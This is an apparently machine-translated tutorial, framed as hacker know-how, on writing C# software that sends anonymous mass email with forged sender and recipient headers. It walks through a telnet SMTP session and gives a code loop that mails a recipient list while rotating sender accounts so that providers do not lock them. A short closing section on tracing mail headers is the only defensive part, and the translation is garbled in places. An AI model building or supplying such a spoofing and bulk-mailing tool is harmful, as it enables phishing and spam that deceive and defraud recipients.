Use C # To create anonymous mass mailing software

From hacker line

Email attacks are one of the most common cyberattacks. Hackers send Trojans, viruses, or specific html code that contains an attack or information to obtain scripts through email, enabling Email users to open such emails may lead to information leakage or even computer control. This attack method often needs to be combined with "social engineering". The mail requires that it be disguised as a sender familiar to mailbox users to confuse the other party and relax their vigilance, to obtain important information and control the peer computer. To gain a deeper understanding of this attack method, I plan to find a free and easy-to-use anonymous mailing group software on the internet some time ago to actually test the effect of sending forged mails, as a result, I couldn't find a satisfactory solution even after I got online. I did not pay for it, but tried it, and there were a lot of plug-in advertisements, the mass mailing software is used too much by the so-called "email marketing", which is rare to find useful and free of charge. If you have the time and energy to go online, it is better to write a proper anonymous repeater on your own. With the source code, you can take the initiative. You can change the code in the future without looking at the "faces" of those "spam" email senders. Haha, do it yourself. Let's prepare the Visual Stdio. NET development environment and write our own anonymous mail group software.
I. Principle of anonymous sending
The widely used mail sending protocol is ESMTP, which is developed from the SMTP protocol. Because the SMTP protocol has no identity authentication or other functions, it has long been disabled by mail service providers, of course, if we set up our own mail sending server, we can use this protocol, because this protocol can implement completely anonymous mail sending without identity authentication. There are still many free mail service providers that allow users to send and receive emails through webpage login. This WebMail method and the SMTP protocol method mentioned above are not discussed in this article, the ESMTP protocol used in this article is widely used by popular email service providers. Before starting programming, we first need a mailbox that supports this protocol for sending test. Currently, most of the mailboxes are supported. Here I select 163 and Sina mail for testing. Next, we will manually send an anonymous email via telnet to learn about ESMTP protocol and anonymous effect (Note: The ">" command is input before) and copy the content to the clipboard.
Code:
> Telnet smtp.163.com 25 // 163 mail sending server domain name and port
220 163.com Anti-spam GT for Coremail System (163com [20081010])
> HELO vvvv // tell the server my machine name, of course, it is forged
250 OK
> Auth login // enter the username and password
334 dXNlcm5hbWU6
> AWAsDSFc // Base64 encoded Username
334 UGFzc3dvcmQ6
> GzlzNMUz // Base64 encoded Password
235 Authentication successful // The system prompts that the Authentication is successful.
> Mail from: <xxxxxx@163.com> // sender address, which must be the same as the above
// The email address corresponding to the entered user name. The 163 server will verify the email address; otherwise, the email cannot be sent.
250 Mail OK
> Rcpt to: <liuhua@sina.com> // real recipient address
250 Mail OK
> DATA // request to send the email content
354 End data with <CR> <LF>. <CR> <LF>
> From: "fajianren" <fanjianren@163.com> // forged sender address
> To: "shoujianren" <shoujianren@sina.com> // forged recipient address
> Subject: helloo Helloo // Email Subject
> Tfffffffffffffff // email body
>
>. // Enter the end mark
250 Mail OK queued as smtp2, DNGowLD7TkkxNiZKCZ + FCg --. 33908S3 1244018310
> Quit // exit
221 Bye now we have logged on to the inbox and found that we have received this forged email. On the surface, we cannot tell the authenticity of this email. The reason is that the ESMTP protocol itself has a problem. It allows the sender to enter the address and name of the sender and recipient without checking, which leads to the appearance of forged email.

II. C # write anonymous mass mailing
Next, start Programming to Implement the anonymous mail group function. Here we use the encapsulated TcpClient class in C #, which can directly provide client connections for TCP network services without using complex socket interface classes. The recipient list and sender account list are stored and displayed in the richTextBox and ListView controls respectively to send a large number of emails using different accounts. This is done to prevent the same email account from being locked by the mail service provider due to sending a large number of emails within the same period of time. The following code is the anonymous sending part of the program: copy the content to the clipboard.
Code:
For (int I = 0; I <richTextBox2.Lines. Length; I ++) // Number of sending times
{// Establish a socket with the SMTP server
TcpClient SmtpServ = new TcpClient (SMTPHoststr, 25 );
NetworkStream NetStrm = SmtpServ. GetStream ();
StreamReader RDStrm = new StreamReader (SmtpServ. GetStream ());
Data = "HELO server" + CRLF; // here we call it server by default.
SzData = System. Text. Encoding. ASCII. GetBytes (Data.
ToCharArray ());
NetStrm. Write (szData, 0, szData. Length );
// Send the authentication command
Data = "auth login" + CRLF;
SzData = System. Text. Encoding. ASCII. GetBytes (Data. ToCharArray ());
NetStrm. Write (szData, 0, szData. Length );
// Send a base64-encoded User Name
Byte [] B = System. Text. Encoding. ASCII. GetBytes (namestr );
String s = Convert. ToBase64String (B );
Data = s + CRLF;
SzData = System. Text. Encoding. ASCII. GetBytes (Data. ToCharArray ());
NetStrm. Write (szData, 0, szData. Length );
// Send a base64-encoded Password
B = System. Text. Encoding. ASCII. GetBytes (passwordstr );
S = Convert. ToBase64String (B );
Data = s + CRLF;
SzData = System. Text. Encoding. ASCII. GetBytes (Data. ToCharArray ());
NetStrm. Write (szData, 0, szData. Length );
// Send sender information
Data = "mail from:" + "<" + Senderstr + ">" + CRLF;
SzData = System. Text. Encoding. ASCII. GetBytes (Data. ToCharArray ());
NetStrm. Write (szData, 0, szData. Length );
// Send Recipient Information
Data = "rcpt to:" + "<" + richTextBox2.Lines [I]. ToString () + ">" + CRLF;
SzData = System. Text. Encoding. ASCII. GetBytes (Data. ToCharArray ());
NetStrm. Write (szData, 0, szData. Length );
ListBox1.Items. Add (RDStrm. ReadLine ());
// Send the Data command
Data = "DATA" + CRLF;
SzData = System. Text. Encoding. ASCII. GetBytes (Data. ToCharArray ());
NetStrm. Write (szData, 0, szData. Length );
// The content of the sent data includes the forged sending Address, recipient address, and name;
Data = ChangeString + "SUBJECT:" + textBox4.Text + CRLF + MIMEString +
CRLF + richTextBox1.Text + CRLF;
SzData = System. Text. Encoding. ASCII. GetBytes (Data. ToCharArray ());
NetStrm. Write (szData, 0, szData. Length );
Data = CRLF + "." + CRLF;
SzData = System. Text. Encoding. ASCII. GetBytes (Data. ToCharArray ());
NetStrm. Write (szData, 0, szData. Length );
// Exit the SMTP server
Data = "QUIT" + CRLF;
SzData = System. Text. Encoding. ASCII. GetBytes (Data. ToCharArray ());
NetStrm. Write (szData, 0, szData. Length );
// Close the connection
NetStrm. Close ();
RDStrm. Close ();
} The above is only part of the code. After the entire program is compiled, it can send anonymous emails to a large number of mailboxes by inputting multiple email accounts that support ESMTP protocol.
Iii. Program Effect
This program sends anonymous test emails to the mailboxes of different email service providers, including yahoo, hotmail, gmail, yeah, 163, 126, qq, and sina mailboxes (applying for such a variety of mailboxes for testing). The sender account uses the 163 mailbox for testing, you can view emails directly by logging on to the mailbox page, in addition to the anonymous test email sent to hotmail, the real sender's email address is displayed after the test email is opened.

Iv. Defense methods
How can we effectively prevent anonymous emails from being cheated by phishing emails? The most effective method is to carefully analyze the header information of suspicious emails. The completed ed field in the mail header shows the complete track of mail sending. When an email is sent to a destination, each transit Server adds a required ed field to the mail header, so that multiple required Ed Fields are contained in the email. Therefore, to track the mail source, you can use bottom-up analysis.